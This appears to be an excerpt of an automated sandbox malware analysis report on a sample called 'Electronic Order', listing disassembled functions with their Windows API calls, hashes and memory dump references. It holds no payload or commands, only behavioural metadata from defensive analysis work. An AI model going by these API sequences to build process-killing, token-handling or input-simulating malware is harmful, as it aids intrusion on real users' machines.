                                      • Instruction Fuzzy Hash: 64118EB2510229BFEF159E60CC85EE77F6DEF0C798F015115FA48A6090C7729C21DBA0
                                      Function 00DE41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00DE4292,?), ref: 00DE41E3
                                      • GetProcAddress.KERNEL32(00000000), ref: 00DE41EA
                                      • EncodePointer.KERNEL32(00000000), ref: 00DE41F6
                                      • DecodePointer.KERNEL32(00000001,00DE4292,?), ref: 00DE4213
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                      • String ID: RoInitialize$combase.dll
                                      • API String ID: 3489934621-340411864
                                      • Opcode ID: b2d3799b608db49b48e3cdd1484191a797e98a7263d514dce6db70c7dc76131b
                                      • Instruction ID: 2131053e9f5418b47d01569d5bbf08897ef6e18770a0bc105b61cd472abebf95
                                      • Opcode Fuzzy Hash: b2d3799b608db49b48e3cdd1484191a797e98a7263d514dce6db70c7dc76131b
                                      • Instruction Fuzzy Hash: 35E0EDB45913419FEB216F73EC0DB0436A4BB52B42F504424F555F50E0DBB5409E8B14
                                      Function 00DE429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00DE41B8), ref: 00DE42B8
                                      • GetProcAddress.KERNEL32(00000000), ref: 00DE42BF
                                      • EncodePointer.KERNEL32(00000000), ref: 00DE42CA
                                      • DecodePointer.KERNEL32(00DE41B8), ref: 00DE42E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                      • String ID: RoUninitialize$combase.dll
                                      • API String ID: 3489934621-2819208100
                                      • Opcode ID: 7cf493eb058980f3c87ae31335956d2c21520b32f0a814a880b0227857b0d41c
                                      • Instruction ID: 2f26160e7c4bb1ca3149294b7877ebfd2330ba9c592abfe63ec6c36afb62cf44
                                      • Opcode Fuzzy Hash: 7cf493eb058980f3c87ae31335956d2c21520b32f0a814a880b0227857b0d41c
                                      • Instruction Fuzzy Hash: 0FE09ABC5427019FEA109F62EC0DB053AA4F715F46F145428F505F11E0DBB4454D8B18
                                      Function 00E2675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove$__itow__swprintf
                                      • String ID:
                                      • API String ID: 3253778849-0
                                      • Opcode ID: dd9f741a82659a823d4949ee15d748aae4244aa3bc9c2687c19c610e119a32c9
                                      • Instruction ID: 7d08fb2dfea5dde60c205e130ca9c01118668a40b7139f1b625788f090fc448f
                                      • Opcode Fuzzy Hash: dd9f741a82659a823d4949ee15d748aae4244aa3bc9c2687c19c610e119a32c9
                                      • Instruction Fuzzy Hash: 39619A315002AAABCF15EF20D896FFE77A5EF44708F044659F8596B192DE34AD42CBB0
                                      Function 00E4046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E40038,?,?), ref: 00E410BC
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E40548
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E40588
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E405AB
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E405D4
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E40617
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E40624
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                      • String ID:
                                      • API String ID: 4046560759-0
                                      • Opcode ID: ecca7cdf794e622774c239b813ddc3c79f511a93e239956bb9002c663b8a6fff
                                      • Instruction ID: bb7e5c60a7961a1bffcc1fc9df6085143eb5fe885cf82121f9e62d9b12add117
                                      • Opcode Fuzzy Hash: ecca7cdf794e622774c239b813ddc3c79f511a93e239956bb9002c663b8a6fff
                                      • Instruction Fuzzy Hash: FC517A31208241AFCB10EF64D885E6FBBE8FF89714F04496DF545A72A1DB31E945CB62
                                      Function 00E45A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenu.USER32(?), ref: 00E45A82
                                      • GetMenuItemCount.USER32(00000000), ref: 00E45AB9
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E45AE1
                                      • GetMenuItemID.USER32(?,?), ref: 00E45B50
                                      • GetSubMenu.USER32(?,?), ref: 00E45B5E
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E45BAF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostString
                                      • String ID:
                                      • API String ID: 650687236-0
                                      • Opcode ID: 6b27a986cfa648b9e134df4dcc489b06daba797c97464fad7458f3eeb0e6ebfa
                                      • Instruction ID: dfe8c204554cb891763152803676c17b33de534599be61ced945714c1d10d5f1
                                      • Opcode Fuzzy Hash: 6b27a986cfa648b9e134df4dcc489b06daba797c97464fad7458f3eeb0e6ebfa
                                      • Instruction Fuzzy Hash: 0D518136A00615EFCF15EFA5D845AAEB7B4EF48710F104469E815BB352CB70AE41CBA0
                                      Function 00E1F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00E1F3F7
                                      • VariantClear.OLEAUT32(00000013), ref: 00E1F469
                                      • VariantClear.OLEAUT32(00000000), ref: 00E1F4C4
                                      • _memmove.LIBCMT ref: 00E1F4EE
                                      • VariantClear.OLEAUT32(?), ref: 00E1F53B
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E1F569
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                      • String ID:
                                      • API String ID: 1101466143-0
                                      • Opcode ID: 82d91dafc10058a50f6db8de0d13723c0cd73382537c7f6e785c8cb76491042e
                                      • Instruction ID: b9d853c913d5ff0236bdd9393874acc35a3ca02f8f23e0b49cdce93e95c959b6
                                      • Opcode Fuzzy Hash: 82d91dafc10058a50f6db8de0d13723c0cd73382537c7f6e785c8cb76491042e
                                      • Instruction Fuzzy Hash: 175168B5A00209EFCB14CF58D880AAAB7F9FF4C314B158169E959EB300D730E952CBA0
                                      Function 00E226F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00E22747
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E22792
                                      • IsMenu.USER32(00000000), ref: 00E227B2
                                      • CreatePopupMenu.USER32 ref: 00E227E6
                                      • GetMenuItemCount.USER32(000000FF), ref: 00E22844
                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E22875
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                      • String ID:
                                      • API String ID: 3311875123-0
                                      • Opcode ID: c9dab6f6ca287e4ae9fa0d3c80fdd85e1b059c2a49ce6c6a261b058bba5d6e0f
                                      • Instruction ID: 80b8286bc6a91f3f945854d8005d2aa6f62c7750a64724b435a36031ebd75526
                                      • Opcode Fuzzy Hash: c9dab6f6ca287e4ae9fa0d3c80fdd85e1b059c2a49ce6c6a261b058bba5d6e0f
                                      • Instruction Fuzzy Hash: F6517070900269EFDF2CCF64E888AADBBF5AF45318F10525DE611BB291D7709944CB51
                                      Function 00DC1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00DC179A
                                      • GetWindowRect.USER32(?,?), ref: 00DC17FE
                                      • ScreenToClient.USER32(?,?), ref: 00DC181B
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DC182C
                                      • EndPaint.USER32(?,?), ref: 00DC1876
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                      • String ID:
                                      • API String ID: 1827037458-0
                                      • Opcode ID: ccfbe252b2c6e928da7a77de7c878a4e5d3b869fec2b7db3d566cbf577b11803
                                      • Instruction ID: c520a0674eaa63007b143268865ab06f3f6a80c63037945d9628bb055f5b1e0f
                                      • Opcode Fuzzy Hash: ccfbe252b2c6e928da7a77de7c878a4e5d3b869fec2b7db3d566cbf577b11803
                                      • Instruction Fuzzy Hash: B541BC74104212AFD710DF25CC84FBA7BF8EB4A724F14466DFA989B2A2C7309809DB71
                                      Function 00E4B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(00E867B0,00000000,015A4E28,?,?,00E867B0,?,00E4B862,?,?), ref: 00E4B9CC
                                      • EnableWindow.USER32(00000000,00000000), ref: 00E4B9F0
                                      • ShowWindow.USER32(00E867B0,00000000,015A4E28,?,?,00E867B0,?,00E4B862,?,?), ref: 00E4BA50
                                      • ShowWindow.USER32(00000000,00000004,?,00E4B862,?,?), ref: 00E4BA62
                                      • EnableWindow.USER32(00000000,00000001), ref: 00E4BA86
                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E4BAA9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: f702949893fcbd3f31d6e0eaa19b1bdefabd4bf45aaf3a394918fb2ad53f0723
                                      • Instruction ID: dd4e791b8d74e836c627d6da01924b13f178b65a2cb1eece5d613fb2f051e1c7
                                      • Opcode Fuzzy Hash: f702949893fcbd3f31d6e0eaa19b1bdefabd4bf45aaf3a394918fb2ad53f0723
                                      • Instruction Fuzzy Hash: 3B416334600241AFDB21CF15E489B957BE0FF49718F1852B9FA58AF2A2C731E84ADB51
                                      Function 00E373B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00E35134,?,?,00000000,00000001), ref: 00E373BF
                                        • Part of subcall function 00E33C94: GetWindowRect.USER32(?,?), ref: 00E33CA7
                                      • GetDesktopWindow.USER32 ref: 00E373E9
                                      • GetWindowRect.USER32(00000000), ref: 00E373F0
                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E37422
                                        • Part of subcall function 00E254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E2555E
                                      • GetCursorPos.USER32(?), ref: 00E3744E
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E374AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                      • String ID:
                                      • API String ID: 4137160315-0
                                      • Opcode ID: ef03fc8305efbf299c12f5787331694d6e6caacee957a6c7107e27db5b2e6957
                                      • Instruction ID: 933dff173b37555d156c6356a22b588cc491ce2d13fa1c2d12f28064c359ba95
                                      • Opcode Fuzzy Hash: ef03fc8305efbf299c12f5787331694d6e6caacee957a6c7107e27db5b2e6957
                                      • Instruction Fuzzy Hash: 1031F272508305AFD720DF14D849F9BBBE9FF89304F001919F899A7191CA30E909CB92
                                      Function 00E18D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E185F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E18608
                                        • Part of subcall function 00E185F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E18612
                                        • Part of subcall function 00E185F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E18621
                                        • Part of subcall function 00E185F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E18628
                                        • Part of subcall function 00E185F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E1863E
                                      • GetLengthSid.ADVAPI32(?,00000000,00E18977), ref: 00E18DAC
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E18DB8
                                      • HeapAlloc.KERNEL32(00000000), ref: 00E18DBF
                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E18DD8
                                      • GetProcessHeap.KERNEL32(00000000,00000000,00E18977), ref: 00E18DEC
                                      • HeapFree.KERNEL32(00000000), ref: 00E18DF3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                      • String ID:
                                      • API String ID: 3008561057-0
                                      • Opcode ID: f9e722edce993ebef1a94d070f3f0d5df05a294622556e2870fa73dcc6ed884d
                                      • Instruction ID: bb2779d2f51b2cd795061fd820f3bad269913aa4fe6f65b586dafb70c671d448
                                      • Opcode Fuzzy Hash: f9e722edce993ebef1a94d070f3f0d5df05a294622556e2870fa73dcc6ed884d
                                      • Instruction Fuzzy Hash: 5011DC35901604FFDB108FA5ED49BEE7BADEF42319F104129E845B3251CB329985CB60
                                      Function 00E18AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E18B2A
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E18B31
                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E18B40
                                      • CloseHandle.KERNEL32(00000004), ref: 00E18B4B
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E18B7A
                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E18B8E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 1413079979-0
                                      • Opcode ID: 3e2d78d8297006c73f8d51de0217d4d6a887afcf8a5283447b61fa216b87004b
                                      • Instruction ID: 2c6b1711eaef5ce6cc964488f4bbcb64466fb9a0940803011a28f6705ec38e1e
                                      • Opcode Fuzzy Hash: 3e2d78d8297006c73f8d51de0217d4d6a887afcf8a5283447b61fa216b87004b
                                      • Instruction Fuzzy Hash: 531189BA504209AFDF018FA5ED49FDA7BA9EF49708F045025FE04B2060C7768DA5EB60
                                      Function 00E4C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DC134D
                                        • Part of subcall function 00DC12F3: SelectObject.GDI32(?,00000000), ref: 00DC135C
                                        • Part of subcall function 00DC12F3: BeginPath.GDI32(?), ref: 00DC1373
                                        • Part of subcall function 00DC12F3: SelectObject.GDI32(?,00000000), ref: 00DC139C
                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00E4C1C4
                                      • LineTo.GDI32(00000000,00000003,?), ref: 00E4C1D8
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E4C1E6
                                      • LineTo.GDI32(00000000,00000000,?), ref: 00E4C1F6
                                      • EndPath.GDI32(00000000), ref: 00E4C206
                                      • StrokePath.GDI32(00000000), ref: 00E4C216
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      • Opcode ID: 23f04778486245c8e29506376d2ae905ed0ddf12db38f5cfc4c50c21886ce23f
                                      • Instruction ID: 4101a3445a609198a89b8a25da1b3929eb7eb6f0eb8e619ef0922d4fa426d47e
                                      • Opcode Fuzzy Hash: 23f04778486245c8e29506376d2ae905ed0ddf12db38f5cfc4c50c21886ce23f
                                      • Instruction Fuzzy Hash: 7A111B7A40014DBFDF119F91EC88FAA7FADEB09354F048021FA186A162C7B19D59DBA0
                                      Function 00DE03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DE03D3
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00DE03DB
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DE03E6
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DE03F1
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00DE03F9
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE0401
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: 7a8607281c51e1e925a83036a6b11267b3cd1adef2f7017f3d4dcb518da5aa9e
                                      • Instruction ID: fad603145508c08e3093f60d611cef4c7c459242fa10b0caaf3f6b676c3f6fd6
                                      • Opcode Fuzzy Hash: 7a8607281c51e1e925a83036a6b11267b3cd1adef2f7017f3d4dcb518da5aa9e
                                      • Instruction Fuzzy Hash: 9F016CB09027597DE3008F5A8C85B52FFA8FF19754F00415BE15C47941C7F5A868CBE5
                                      Function 00E2568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E2569B
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E256B1
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00E256C0
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E256CF
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E256D9
